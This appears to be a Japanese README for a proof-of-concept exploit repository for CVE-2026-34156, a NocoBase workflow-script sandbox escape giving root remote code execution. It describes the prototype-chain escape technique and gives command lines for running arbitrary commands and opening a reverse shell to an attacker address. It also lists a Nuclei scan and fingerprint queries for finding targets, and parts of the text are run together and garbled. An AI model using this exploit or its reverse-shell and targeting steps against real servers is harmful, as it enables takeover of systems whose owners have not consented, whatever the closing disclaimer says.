
CVE-2026-34156
NocoBase における未認証 / 低権限 → Root リモートコード実行
CVE-2026-34156 は、NocoBase(オープンソースのノーコード / ローコードプラットフォーム)における重大なサンドボックスエスケープの脆弱性です。
ワークフロースクリプトノードを作成または実行できる攻撃者(低権限でも可)は、Node.js の vm サンドボックスをエスケープし、コンテナ内でroot としての完全なリモートコード実行を達成できます。
@nocobase/plugin-workflow-javascript(スクリプトノード)console._stdout.constructor.constructor によるサンドボックスエスケープuid=0)fs)サンドボックスに渡される console オブジェクトはホストレルムのものであり、攻撃者はプロトタイプチェーンをたどって実際の Function コンストラクタ → process.mainModule.require にアクセスできます。
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
リポジトリに含まれるもの: 完全な PoC スクリプト、Nuclei テンプレート、安全性チェッカー。
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm)を使用する。
このリポジトリは教育目的および許可を得たセキュリティ研究のみを対象としています。
使用するのは、自分が所有しているか、明示的な書面による許可を得たシステムのみにしてください。
無断での悪用は違法です。
セキュリティコミュニティのために ❤️ を込めて
安全を確保し、迅速にパッチを適用しましょう。